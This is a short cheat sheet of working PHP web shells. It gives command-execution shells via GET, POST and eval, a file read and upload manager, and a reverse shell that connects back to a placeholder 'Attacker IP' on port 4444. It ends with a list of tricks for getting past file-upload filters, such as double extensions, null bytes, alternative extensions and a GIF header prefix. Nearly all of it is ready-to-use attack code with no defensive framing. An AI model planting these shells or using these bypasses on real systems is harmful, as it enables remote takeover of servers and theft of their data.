🔥 PHP Web Shell Examples:
1. Simple PHP Shell (shell.php):
<?php system($_GET['cmd']); ?>
Usage: shell.php?cmd=whoami
2. Advanced PHP Shell (advanced_shell.php):
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<html>
<body>
<form method="POST">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
</body>
</html>
3. PHP File Manager Shell (filemanager.php):
<?php
if(isset($_GET['file'])){
echo file_get_contents($_GET['file']);
}
if(isset($_POST['upload'])){
move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="f">
<input type="submit" name="upload" value="Upload">
</form>
4. PHP Reverse Shell:
<?php
$ip = '10.0.0.1'; // Attacker IP
$port = 4444; // Attacker Port
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>
5. One-liner PHP Shell:
<?php eval($_POST['cmd']); ?>
6. PHP Info Shell:
<?php phpinfo(); system($_GET['c']); ?>
Bypass Techniques:
• Double extensions: shell.php.jpg
• Null byte: shell.php%00.jpg
• Case manipulation: shell.PhP
• Alternative extensions: .php3, .php4, .php5, .phtml, .phar
• Content-Type manipulation
• Add GIF header: GIF89a<?php system($_GET['cmd']); ?>